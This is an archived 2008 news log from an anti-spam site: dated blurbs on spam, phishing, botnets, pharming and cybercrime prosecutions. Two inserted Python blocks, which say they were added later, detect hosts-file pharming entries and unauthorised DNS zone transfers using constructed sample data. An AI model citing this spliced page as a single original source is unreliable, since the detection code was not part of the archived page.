It's about time, Spanish is only the most widely spoken language in the world. Some subject lines:
"Construya Indicadores Integrales con el Balanced Scorecard. Publicidad . neszs"
"NEGOCIACION GANAR GANAR O NO HAY TRATO. PUBLICIDAD . o0j3w"
"INFORME DE SUMA IMPORTANCIA. Publicidad . 0dmuq"
"PARA SECRETARIAS - EL MEJOR CONGRESO 2008. PUBLICIDAD . 912t6"
"TE ESPERAMOS. LLAMANOS . 472-8846 . m2pbj"
"LUCE TU MEJOR SONRISA...!!!. Publicidad . pvlp"
Knujon fights the spam in your mail! Send it here.
March 25, 2008
Automate Outlook for Knujon and make a custom toolbar button
March 24, 2008
Valid topics for 2008 include not just plain spam, but "other cybercrimes" such as phishing, IM spam, SMS spam, MMORPG spam, blog spam, trackback spam, photo spam, stock pump-and-dumps, email con games, exploit marketing, zombie bots and bot armies, setting up antispam systems, and antispam countermeasures including hardware, software, wetware, and blue-ware.
(spamconference.org)
March 23, 2008
The FBI has opened a preliminary investigation of a report that China-based hackers have penetrated the e-mail accounts of leaders and members of the Save Darfur Coalition, a national advocacy group pushing to end the six-year-old conflict in Sudan.
(washingtonpost.com)
March 22, 2008
March 21, 2008
PORTLAND, Maine (AP) — At first, it sounded like another in a long line of credit card breaches: Up to 4.2 million account numbers were stolen by thieves who cracked computers at Hannaford Bros. Co., an Eastern supermarket chain. But the specifics of the crime, revealed this week, included some troubling twists that might expose big holes in the payment industry's security standards. (ap.google.com)
Hannaford's Investigating Fraud After Security Breach (wptz.com)
Hannaford fraud linked to pin transactions (blogs.computerworld.com)
Hannaford logo's disappearing act (boston.com)
March 20, 2008
Vital business emails are going astray, intercepted and quarantined by YahooXtra's spam filters without the knowledge of the sender or the receiver. Wellington-based Graphic Dimensions, which provides IT support and services to architectural design companies, has had problems sending email to xtra.co.nz addresses since the beginning of February. Email from the company, which is also an Xtra customer, is classified by the YahooXtra mail filter as spam, says Graphic Dimensions technical director, Paul O'Brien.
This is causing problems for Graphic Dimensions because important messages from its clients, primarily architects, to contractors are going AWOL, O'Brien says.
(computerworld.co.nz)
March 19, 2008
Another company has settled charges today with the Federal Trade Commission over violations of the CAN-SPAM Act, netting the FTC another $2.9 million in civil penalties. Online advertiser ValueClick and its subsidiaries were charged with using deceptive e-mails, banner ads, and pop-ups to drive traffic, as well as a failure to secure customers' financial information. The settlement is the largest in CAN-SPAM's five-year history, says the FTC, and bars the companies from any further violations. (arstechnica.com)
March 18, 2008
Even magazines can be brandjacked...

...diverts users to this site:

Real Men's Health site is here: menshealth.com
Obviously an unwitting victim, but are they liable?
"If they don't act soon, frequently-phished companies may be held liable for crimes committed in their names" (darkreading.com). Knujon has notified Men's Health but they have not responded or taken any action against the fake pharmacy website.
March 17, 2008
A Ukrainian man once known as one of the top ringleaders in Eastern Europe-based organized cyber crime is now heading up a new political party there.
Dmitry Ivanovich Golubov, a 24-year-old from Odessa, is leading the upstart "Internet Party of Ukraine," a party he helped create shortly after parliamentary elections in the country last fall. In 2005, Golubov -- a.k.a. "script" -- was arrested and jailed on charges of trading in credit and debit card credentials stolen via computer viruses and password-snatching Trojan horse programs, thefts that caused millions of dollars in losses to banks over several years. (washingtonpost.com)
March 16, 2008
Security vendor Trend Micro has fallen victim to a widespread Web attack that splashed malicious software onto hundreds of legitimate Web sites in recent days.
(washingtonpost.com)
March 15, 2008
Robert Soloway, dubbed the "spam king" for having sent millions of
unwanted e-mails around the globe, pleaded guilty today to mail fraud,
fraud in connection with electronic mail and failing to file a tax return.
(nwsource.com)
March 14, 2008
There’s a common problem in Windows XP that can make network browsing very slow.
If the 'My Network Places' folder contains a shortcut to a network share, then each refresh of the explorer window will attempt to read icon information from every file in the remote location, causing the system to slow to a crawl.
Removing all shortcuts from 'My Network Places' will return the system response to normal.
(ss64.com)
March 13, 2008
~Video~
(cnn.com)
March 12, 2008
ZHOUSHAN, China (CNN) -- They operate from a bare apartment on a Chinese island. They are intelligent 20-somethings who seem harmless. But they are hard-core hackers who claim to have gained access to the world's most sensitive sites, including the Pentagon.
(cnn.com)
March 11, 2008
Russian security vendor Kaspersky Lab has a prototype version of its virus protection software waiting in the wings in case Apple Mac OS X suddenly becomes a target of choice for hackers.
(washingtonpost.com)
March 10, 2008
An adult Web site whose affiliates sent pornography-related spam to
unsuspecting recipients will pay $413,000 (£207,000) to settle a complaint
from the US Federal Trade Commission.
(computerworlduk.com)
March 9, 2008
Many links on the discussion group site link to pxxx aggregators, some of which
redirect to malware sites pushing Trojan horse malware (such as VirusHeat)
disguised as video codecs.
(theregister.co.uk)
March 8, 2008
Rod Rasmussen, president and CTO of anti-phishing vendor, Internet
Identity, said the company has primarily focused on the US market, but is
now seeing a rapid increase in phishing activity beyond North America and
Europe.
(zdnet.com.au)
March 7, 2008
A court in Virginia has struck down a spammer's appeal that his conviction
violated his rights to free speech.
Jeremy Jaynes was named as one of the world's top 10 spammers in 2003 by
watchdog Spamhaus, and was estimated by prosecutors to be pumping out 10
million emails a day netting him US$750,000 per month.
(itnews.com.au)
March 6, 2008
LONDON — YouTube is facing criticism for making it too easy for people to upload violent or sexually explicit content to the Internet after a 25-year-old mother was filmed while being raped.
(foxnews.com)
March 5, 2008
March 4, 2008
Six botnets are responsible for 85 per cent of all spam, according to an
analysis by net security firm Marshal.
(theregister.co.uk)
March 3, 2008
A divided Virginia Supreme Court affirmed the nation's first felony
conviction for illegal spamming on Friday, ruling that Virginia's
anti-spamming law does not violate free-speech rights.
Jeremy Jaynes of Raleigh, N.C., considered among the world's top 10
spammers in 2003, was convicted of massive distribution of junk e-mail and
sentenced to nine years in prison.
Almost all 50 states have anti-spamming laws. In the 4-3 ruling, the court
rejected Jaynes' claim that the state law violates both the First
Amendment and the interstate commerce clause of the U.S. Constitution.
(dailyreportonline.com)
March 2, 2008
A serial junk-mailer known as the "Spam King" will appear in a Seattle
court next month, in a criminal trial being hailed as a major blow in the
fight against unsolicited emails.
(computerworlduk.com)
March 1, 2008
Top brands face up to 10,000 "brandjacking" incidents a week from
cybersquatters who are trying to pass off fake sites as genuine, according
to new statistics from researcher MarkMonitor.
(computerweekly.com)
February 29, 2008
Hotmail suffered a worldwide outage Tuesday as Microsoft Corp. deals with technical difficulties.
Hotmail, one of the world's leading e-mail services, was not working the majority of the day on Tuesday. The outage problems also affected MSN and Microsoft's Windows Live portal.
(transworldnews.com)
February 28, 2008
Comcast pushed back at a barrage of criticism yesterday that the huge telecom company was deliberately blocking file-sharing by some Internet users.
Appearing at a special Federal Communications Commission hearing yesterday at Harvard Law School, representatives from Comcast rejected accusations that it was hassling certain Internet users for competitive reasons.
(bostonherald.com)
February 27, 2008
(CNN) -- An apparent move by the Pakistani government to block YouTube, the popular video-sharing Web site, knocked out access to the site worldwide for more than two hours, Internet analysts say. (cnn.com)
February 26, 2008
Kabul: The Taliban on Monday warned mobile telecommunication service companies to shut down at night their booster towers in Taliban-held areas in Afghanistan within three days, a statement released by the militants said.
“We are calling on all cellular phone service companies to shut down their activities from 5 pm to 7 am (local time) next day in Taliban-held areas within three days,” the statement read out by the outfit's purported spokesman Zabihullah Mujahid to media outlets in south Afghanistan said.
(sify.com)
February 25, 2008
CONCORD, N.H.—Attorney General Kelly Ayotte has agreed to mediate a dispute between the New Hampshire Troopers Association and the New Hampshire Highway Patrol Association.
In a lawsuit filed in 2006, the troopers union accused the highway patrol group of registering several Internet domain names that either deceived the public into sending money to the wrong group or directed visitors to sites that disparaged the troopers. In a counter claim, the highway patrol group accused state troopers of libel for trying to scuttle a highway patrol speed trap by warning motorists to slow down.
(boston.com)
February 24, 2008
SAN FRANCISCO -- Wanted: computer virus writers. Must be fluent in Mandarin. Or Russian. Or Portuguese.
These hacker help wanted ads are appearing on underground Internet channels as malicious code designers increasingly want programmers with foreign-language skills to help launch country-specific attacks, security vendor McAfee Inc. said in a report Thursday. (washingtonpost.com)
February 23, 2008
According to research from Trend Micro's TrendLabs(SM), hackers are
intensifying their attacks on legitimate Web sites. It debunks the adage
to simply not visit questionable sites: just because a user visits a gambling or
adult-content site doesn't necessarily mean Web threats are lurking in the
shadows; the site with the latest sports news or links in a search engine
result, however, could potentially infect visitors with malware.
(prosecurityzone.com)
February 22, 2008
In the wake of the recent malvertising incidents, it's about time we get to the bottom of the campaigns, define the exact hosts and IPs participating, all of their current campaigns, and who's behind them. Who's been hit at the first place? Expedia, Excite, Rhapsody, MySpace, all major web properties. (ddanchev.blogspot.com)
February 21, 2008
Canadian police have arrested 17 people suspected of running a huge botnet
of compromised PCs. Up to one million computers in various countries were
allegedly under the control of the suspects, who range in ages from 17 to
26. All but one are male, UPI reports.
(theregister.co.uk)
February 20, 2008
WASHINGTON -- The federal government is falling farther and farther behind
in its fight against cybercrime and, despite an increase in the amount of
resources being allocated to address the problem, it will continue to
struggle without a lot of help from law enforcement agencies at the state,
local and international levels, current and former government security
officials say.
(searchsecurity.techtarget.com)
February 19, 2008
The past few years have seen a major change in the world of cybercrime. The
sheer number of crimes has increased substantially, but that's not the
whole story. Merely increasing the amount of money and people that your
company throws at the problem is no longer enough to keep pace with the
changes. Cybercrimes, and the cybercriminals that perpetrate them, have
evolved. To protect your company from the new wave, your methods and
attitudes must evolve too.
(contractoruk.com)
February 18, 2008
TOKYO -- Police on Friday said they have arrested a man for sending 2.2
billion spam emails with fake sender information. Yuki Shiina, 25, was
arrested for allegedly sending nine spam emails, which were ads for
gambling and dating services, with fake sender information on Nov 13,
2007, after an Internet service provider reported to police that he was
sending a massive amount of emails last September. (japantoday.com)
February 14, 2008
The BlackBerry outage, the service's second major interruption since April 2007, began at about 3:30 p.m. New York time Monday. Service was restored roughly three hours later, the company said in a statement. No messages were lost. Calling and text-messaging services weren't affected.
Research In Motion said in a statement issued late Tuesday afternoon that the outage was caused by "a problem with an internal data routing system within the BlackBerry service infrastructure that had been recently upgraded." The company has been upgrading capacity throughout its server farms to accommodate growing demand for its BlackBerry services.
(news.com)
February 13, 2008
The numbers of malicious programs circulating online is hitting an unprecedented high, say experts.
(news.bbc.co.uk)
February 12, 2008
Of the top 20 companies targeted by phishing in 2007, the report says, 19 are in the banking industry.
Computer users are often tricked into visiting fraudulent sites because of "danger, danger" e-mail subject lines like "account security measures," "important notice" or "(your bank name) security notice."
One sneaky thing some malware (malicious threats) does is to modify a user's server information.
For example, a user types www.bankofamerica.com into his or her browser. But instead of the computer using the service provider's server, which would take the user to the real Bank of America server, the computer uses a bogus server run by phishers -- and that takes the user to a fake Bank of America server.
The phishers take the user's login information and empty the account.
(cnn.com)
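The "modify a user's server information" trick described above is usually done by rewriting the local hosts file or the resolver settings so a bank's name resolves to an address the phishers control. The following is an added example, not code from the original page or from the CNN article, showing the simplest defender-side check: parse a hosts file and flag any watched brand domain that is pinned to a non-loopback address. The watchlist, the sample hosts file and the addresses in it are constructed for the example.

```python
"""Detect hosts-file pharming entries (added example, not from the page).

Parses a Windows/Unix hosts file and reports entries that map a watched
domain (banks, webmail) to an address other than the local host. Malware
that hijacks name resolution the way the CNN excerpt describes often does
exactly this, so the check is cheap to run on every endpoint.
"""
import ipaddress
import re

# Assumed defender watchlist of domains that should never be pinned in a
# hosts file; extend it with the brands your users actually visit.
WATCHLIST = {
    "www.bankofamerica.com",
    "bankofamerica.com",
    "www.paypal.com",
    "login.yahoo.com",
}

# Loopback and the unspecified address are normal in hosts files
# (ad blockers sink hostnames there), so those entries are not pharming.
_BENIGN_NETS = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("0.0.0.0/32"),
]


def parse_hosts(text):
    """Yield (ip, [hostnames], line_number) for each active hosts entry."""
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # strip trailing comments
        if not line:
            continue
        parts = re.split(r"\s+", line)
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line; ignore rather than crash
        yield ip, [h.lower() for h in parts[1:]], lineno


def suspicious_entries(text, watchlist=WATCHLIST):
    """Return watched domains mapped to a non-local address, in file order."""
    hits = []
    for ip, names, lineno in parse_hosts(text):
        if any(ip in net for net in _BENIGN_NETS):
            continue
        for name in names:
            # exact match or a subdomain of a watched apex
            if name in watchlist or any(name.endswith("." + w) for w in watchlist):
                hits.append({"line": lineno, "ip": str(ip), "host": name})
    return hits


# Constructed sample: two normal entries, one ad-blocker entry and two
# hijacked bank/webmail entries pointing at documentation-range addresses.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1       metrics.example.test   # user-added ad blocker entry
203.0.113.45    www.bankofamerica.com bankofamerica.com
198.51.100.7    login.yahoo.com
"""

if __name__ == "__main__":
    for hit in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {hit['line']}: {hit['host']} -> {hit['ip']}")
```

On the sample above the check reports the two bank names on line 5 and the Yahoo login host on line 6, and ignores the loopback entries. A resolver-level hijack (changed DNS server addresses) needs a separate check of the system's resolver configuration; the hosts file is only the most common of the two places this malware writes to.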
February 11, 2008
Russia might be a country trying to regain superpower status, but it has
already reached it in one less welcome area: the amount of spam it sends
to the world.
(techworld.com)
February 10, 2008
For the longest time, it had been botnet-infected computers in
the U.S. that pumped out the bulk of offers for mortgages and herbal
Viagra, which comprised a staggering 78.5 percent of all e-mail floating
around on the Internet according to Symantec.
(internetnews.com)
February 9, 2008
European spam networks have pumped out more unsolicited e-mail than those
in the U.S. for the third month in a row, according to security vendor
Symantec. (news.com)
February 8, 2008
Judge David Coar of the U.S. District Court for the Northern District of
Illinois, Eastern Division, has also ordered Sili Neutraceuticals and owner
Brian McDaid to pay nearly US$2.6 million for allegedly making false
advertising claims and sending e-mail messages in violation of the FTC Act and
the CAN-SPAM Act. (networkworld.com)
February 7, 2008
REDMOND, Wash. -- Feb. 4, 2008 -- Prison sentences handed down to
counterfeiters by a Taipei, Taiwan, court mark the end of a string of
successful prosecutions by international law enforcement agencies,
bringing a global software counterfeiting ring to a final halt. Between
1997 and 2003, Huang Jer-sheng, owner of the Taipei-based distributor
Maximus Technology Inc., and his associates were responsible for the
production and distribution of more than 90 percent of the high-quality
counterfeit Microsoft software products either seized by law enforcement
or test-purchased around the world.
(microsoft.com)
February 6, 2008
NEW YORK -- The U.S. Attorney in Manhattan announced that more than $1
billion in assets were seized last year from companies and individuals accused of
fraud and other wrongdoing. Prosecutors said much of the $1.1 billion in assets
included seizures from Wall Street scams, the Oil-For-Food Scandal, public
corruption and international drug rings.
(wnbc.com)
February 5, 2008
NEWS.com.au takes you inside the secretive online world of Islamic
extremists with a special report on how they are using the latest technology to drive
propaganda campaigns, cheering Australian troop deaths and mocking our political
leaders.
(news.com.au)
February 4, 2008
A do-it-yourself phishing kit, which makes it easy for inexperienced
scammers to target users of popular social networking websites such as Orkut, MySpace
and Facebook and webmail platforms like Yahoo and Hotmail, was found by
researchers from FaceTime Communications this week. (scmagazineus.com)
February 3, 2008
Pharmacologist Dora Akunyili is a remarkably honest woman. The trait
earned her a job as Nigeria's pharmaceutical industry enforcer. Her campaign against
the country's counterfeiters has put her life in danger, but she has no plans
to back down.
(spiegel.de)
February 2, 2008
Thanks to Thunderbird, SecondWheel, CyberTopCops, and SoftPedia we have some great utilities and
instructions. SecondWheel has added a number of options
to his already excellent KnujOn Thunderbird Extension.
KnujOn Thunderbird Extension (secondwheel.googlepages.com)
Transform Your PC Into a Spam Reporting Machine (cybertopcops.com)
Thunderbird extension that Forwards all emails marked Junk (as attachments) to KnujOn.com (softpedia.com)
February 1, 2008
Craigslist ads lead police to prostitute ring (azcentral.com)
Traveling 'circuit girls' flock to Super Bowl (sportingnews.com)
"A lot of girls are advertising on the Internet" (foxnews.com)
January 31, 2008
DUBAI, United Arab Emirates (CNN) -- High-technology services across large tracts of Asia, the Middle East and North Africa were crippled Thursday following a widespread Internet failure which brought many businesses to a standstill and left others struggling to cope.
Industry experts are blaming damage to two undersea cables but it is not known what caused the damage.
Reports say that Egypt, Saudi Arabia, Qatar, the United Arab Emirates, Kuwait, Bahrain, Pakistan and India are all experiencing severe problems.
(cnn.com)
January 30, 2008
FORT WORTH, Texas -- An international gang of cyber criminals hacked into OmniAmerican Bank's records, the bank's president disclosed Wednesday.
(sunherald.com)
January 29, 2008
LOS ANGELES, California (AP) -- A revamped online file-sharing service that promised to offer unlimited, free music downloads from all the major record labels hit an apparent snag Sunday after one denied it had given the service permission.
(cnn.com)
January 28, 2008
A 15-year-old Florida girl's MySpace page has been hijacked and defaced with sexually explicit and hateful content, Tampa Bay affiliate FOX 13 reported, raising questions about security on Internet networking sites and what is being done to improve it.
(foxnews.com)
January 27, 2008
PARIS (AP) — Police on Saturday questioned the young trader blamed for a massive fraud that cost France's Societe Generale bank more than $7 billion, as the country's president accused global financial institutions of having "gone haywire" and urged common sense.
(ap.google.com)
January 26, 2008
A Michigan woman is under arrest after being accused of using Craigslist to find someone to kill a Northern California woman.
Federal investigators said 49-year-old Ann Marie Linscott contacted several people through Craigslist.org.
(kcra.com)
January 25, 2008
JACKSONVILLE, FL -- The target may be high-tech, but the emotion involved is as old as humanity. Spite, anger, and revenge. Police say that's what filled a woman's heart after she picked up the classified ads. (firstcoastnews.com)
January 24, 2008
BEIJING (Reuters) - China shut down 44,000 Web sites and homepages and arrested 868 people last year in a campaign against Internet porn which will continue until the end of this year's Beijing Olympics, Xinhua news agency said on Wednesday.
(thestar.com.my)
January 23, 2008
A Moroccan group called "Mr. Brain" is offering free phishing kits on a Web site hosted in France, said Paul Mutton, Internet services developer at Netcraft, a security company in Bath, England.
The software packages make it easy to quickly set up a fraudulent Web site mimicking a known brand in order to trick people into divulging credit card details or bank account numbers. Templates for spam e-mail are also included, targeting brands such as Bank of America, eBay, PayPal, and HSBC.
(infoworld.com)
January 22, 2008
The repercussions for cybercriminals are finally coming in line with the severity of their crimes. With international computer crime authorities joining efforts in a bid to bring down hackers, malware authors and spammers, the past 12 months have seen more arrests and harsher sentencing for criminals involved in high-profile crimes. Below are some of the cases that made the news in just in the second half of 2007. (net-security.org)
January 21, 2008
Sharon D. Richards, 43, of Sacramento has been sentenced to five years in prison after pleading guilty to hacking an online bank account of another person and writing more than $200,000 in checks on it.
The case began when the victim’s purse was stolen. (centralvalleybusinesstimes.com)
January 20, 2008
A consortium of British and US military agencies and defense and aerospace firms have agreed a new standard for secure email. Security experts are watching the developments closely, but are unsure how much of the specification will make it into public use or commercial email security products. (theregister.co.uk)
January 19, 2008
Several cities outside the U.S. have sustained attacks on utility systems and extortion demands. Criminals have been able to hack into computer systems via the Internet and cut power to several cities, a U.S. Central Intelligence Agency analyst said this week.
Speaking at a conference of security professionals on Wednesday, CIA analyst Tom Donahue disclosed the recently declassified attacks while offering few specifics on what actually went wrong.
(pcworld.com)
January 18, 2008
North Dakota Judge Gets it Wrong: ...WAY wrong. This is just mind blowing.
Ever been prosecuted for tracking spam? Running a traceroute? Doing a zone transfer? Asking a public internet server for public information that it is configured to provide upon demand?
No? Well, David Ritz has. And amazingly, he lost the case.
Here are just a few of the gems that the court has the audacity to call ”conclusions of law.” Read them while you go donate to David’s legal defense fund. He got screwed here, folks, and needs your help.
“Ritz’s behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law.” You might not know what a zone transfer is, but I do. It’s asking a DNS server for all the particular public info it provides about a given domain. This is a common task performed by system administrators for many purposes. The judge is saying that DNS zone transfers are now illegal in North Dakota.
(circleid.com)
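The post above treats a zone transfer as an ordinary request for data a DNS server is configured to hand out, and on the server side that is exactly where the control belongs: operators decide which secondaries may pull a zone (in BIND, the `allow-transfer` option) and audit what was requested. As an added example, not from the page or the CircleID post, here is a check that scans BIND 9 style query-log lines for AXFR/IXFR requests and reports the ones that did not come from an allowlisted secondary. The log lines are constructed to follow BIND's "client ADDR#PORT (NAME): query: NAME IN TYPE" layout; the zone name, the allowlist and all addresses are placeholders.

```python
"""Report zone-transfer requests from hosts that are not known secondaries
(added example, not from the page).

Input is BIND 9 style query-log text; output is a list of AXFR/IXFR
requests whose client is missing from the per-zone allowlist. Such a
request is not an attack by itself, but it is the thing an operator wants
to see if the server's transfer policy is looser than intended.
"""
import re

# Assumed allowlist: the secondary name servers permitted to pull each zone.
ALLOWED_TRANSFER_PEERS = {
    "example.org": {"198.51.100.2", "198.51.100.3"},
}

# Matches the query portion of a BIND query-log line; the optional
# "@0x..." token is the client handle newer BIND versions print.
_QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<client>[0-9a-fA-F.:]+)#\d+ "
    r"\((?P<qname>[^)]+)\): query: (?P<name>\S+) IN (?P<qtype>\S+)"
)


def parse_query(line):
    """Return (client_ip, name, qtype) for a query-log line, or None."""
    m = _QUERY_RE.search(line)
    if not m:
        return None
    return (
        m.group("client"),
        m.group("name").rstrip(".").lower(),
        m.group("qtype").upper(),
    )


def unexpected_transfers(lines, allowed=ALLOWED_TRANSFER_PEERS):
    """Return AXFR/IXFR requests whose client is not an allowlisted peer."""
    findings = []
    for line in lines:
        parsed = parse_query(line)
        if parsed is None:
            continue
        client, zone, qtype = parsed
        if qtype not in ("AXFR", "IXFR"):
            continue  # ordinary lookups are not transfers
        if client in allowed.get(zone, set()):
            continue  # a known secondary pulling its zone
        findings.append({"client": client, "zone": zone, "qtype": qtype})
    return findings


# Constructed sample log: one legitimate transfer, one ordinary A lookup,
# and two transfer requests from hosts that are not in the allowlist.
SAMPLE_LOG = [
    "10-Mar-2008 09:12:01.104 queries: info: client 198.51.100.2#53 "
    "(example.org): query: example.org IN AXFR -E (192.0.2.53)",
    "10-Mar-2008 09:12:05.310 queries: info: client 203.0.113.9#41232 "
    "(www.example.org): query: www.example.org IN A +E (192.0.2.53)",
    "10-Mar-2008 09:13:44.002 queries: info: client 203.0.113.9#41240 "
    "(example.org): query: example.org IN AXFR -E (192.0.2.53)",
    "10-Mar-2008 09:14:10.777 queries: info: client 203.0.113.77#5000 "
    "(example.org): query: example.org IN IXFR -E (192.0.2.53)",
]

if __name__ == "__main__":
    for f in unexpected_transfers(SAMPLE_LOG):
        print(f"{f['qtype']} of {f['zone']} requested by {f['client']}")
```

Run against the sample the check lists the two requests from 203.0.113.9 and 203.0.113.77 and stays silent about the allowlisted secondary and the normal A lookup. Whether a server answers the unexpected requests at all is decided by its transfer policy, not by this script; the script only shows you what was asked.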
January 17, 2008
Russian researchers released a program for automated Yahoo! CAPTCHA recognition.
(network-security-research.blogspot.com)
The Decline of CAPTCHA
Spammers use porn to get unsuspecting users to break CAPTCHA codes
Captcha bypassed
January 16, 2008
The "random js toolkit" is a Javascript code that is created dynamically
and provides a random filename that can only be accessed once. As a
consequence, it changes every time it is accessed. The dynamic embedding,
known as "code obfuscation," is done in such a selective manner that once
a user has received a page with the embedded malicious code, it will not
be referenced again during future visits. (linuxinsider.com)
January 15, 2008
ALBANY, New York (AP) -- MySpace has reached an agreement with more than 45 states to make changes to help prevent sexual predators and others from misusing it, state officials said Monday.
Several states' attorneys general said in a statement that the huge social networking Web site has agreed to add several protections and participate in a working group to develop new technologies, including a way to verify the ages of users. Other social networking sites will be invited to participate. (cnn.com)
January 14, 2008
Your cell phone rings, you pick up, say "hello" and hear tones. This is a "fax blast." A program calls numbers in a list or at random and attempts to fax an unsolicited advertisement. You can fight back.
(303) 296-2573
Whocallsme.com: Look up numbers calling in fax and cell spam
whocalled.us
800notes.com
More on Junk Faxes
January 13, 2008
The same cell phones that parents buy as safety devices for their children are the gadgets that pedophiles and predators use to prep kids for sexual encounters, experts and police say. (cnn.com)
January 12, 2008
Facebook users are being warned about a new application on the social networking site that contains adware.
'Secret Crush' contains a download of the Zango adware program which automatically sends itself to five friends. (vnunet.com)
January 11, 2008
Viruses, malware and online crime are evolving from the realm of geeks into a major shadow economy that closely mimics the real world.
Maksym Schipka, a senior architect at security firm MessageLabs, claims to have identified a sophisticated online black market with tens of thousands of participants. (vnunet.com)
January 10, 2008
"Certainly the criminals have moved downstream to smaller financial institutions," said Avivah Litan, a vice president and research director at Gartner Inc. in Stamford, Conn. "That's been the trend for well over a year, because the larger banks have employed services to take these phishing command and control services down. So criminals would rather use brands that are not going to go after them. It's easier to attack smaller banks that haven't geared up to protect themselves. They can go undetected. And as soon as they are detected, these smaller banks are caught off guard." (searchcio-midmarket.techtarget.com)
January 9, 2008
This is Notice of Class Action Lawsuit and Proposed Settlement ("Notice") of a proposed settlement in a class action lawsuit. The Settlement would resolve a lawsuit brought on behalf of individuals who received phone calls or faxes allegedly made by or on behalf of independent distributors of Herbalife International, Inc. ("Herbalife"). (tcpasettlement.com)
More on Junk Faxes
January 8, 2008
Our labs (McAfee) trapped many thousands of spam overnight that are abusing the Windows Live SkyDrive Beta service launched in August last year (or rather it's the new name for Windows Live Folders…). The service allows you to upload up to 1Gb of files and share them with anyone via weblinks. The trapped pill spam promises the usual assurances: (avertlabs.com)
January 7, 2008
The Internet is boundless and cybercrime scenes stretch from personal desktops across the fiber networks that circle the globe. Digital forensic investigators like Harold Phipps, vice president of industry relations at Norcross Group in Norcross, Ga., routinely slip across conventional geographic jurisdictions in pursuit of digital evidence and wrongdoers. (baselinemag.com)
January 6, 2008
Office of Critical Infrastructure Protection and Compliance Policy (treas.gov)
OnGuardOnline.gov provides practical tips from the federal government and the technology industry to help you be on guard against Internet fraud, secure your computer, and protect your personal information. (onguardonline.gov)
January 5, 2008
The US Department of Justice went public today with the indictment of Alan Ralsky and 10 others who helped him. Alan Ralsky topped our Top 10 Worst Spammers list for quite some time and was involved in almost any sort of spam activity that's being done. He and his gang frequently sent millions of spam messages per day. In recent years his focus has been on stock spam, and that's a key part of what the US DOJ indicted him for. (spamhaus.org)
January 4, 2008
Eleven people, including one of the top spammers in the world, were indicted on Thursday for allegedly sending millions of unsolicited e-mails intended to inflate the price of Chinese penny stocks. (washingtonpost.com)
January 3, 2008
It's getting more and more difficult to do any kind of domain research without running the risk of losing your domain ideas to unscrupulous domain tasters. (dailydomainer.com)
January 2, 2008
A way of double spamming - combo of spamming email users and mailing lists to get a profit:
#1 Spammer sends a spam e-mail to a mailing list that doesn't have rigorous moderating - in this case netbsd-docs. The post is mirrored online.
#2 Spammer then sends actual spam e-mails that pass through anti-spam filters (Mail application locally categorizes it as junk) with direct links to a link on a rather well known domain. (net-security.org)
January 1, 2008
On November 13, 2007 Prosecutors from the Directorate for Investigating Organized Crime and Terrorism arrested 9 of the 22 persons who were charged for the crimes of setting up an organized criminal group, computer fraud, fraudulent use of electronic payment instruments, and production and maintenance of equipment needed to counterfeit electronic payment instruments. (scamfraudalert.com)
News from 2007 has been archived.
News from 2006 has been archived.
News from 2005 has been archived.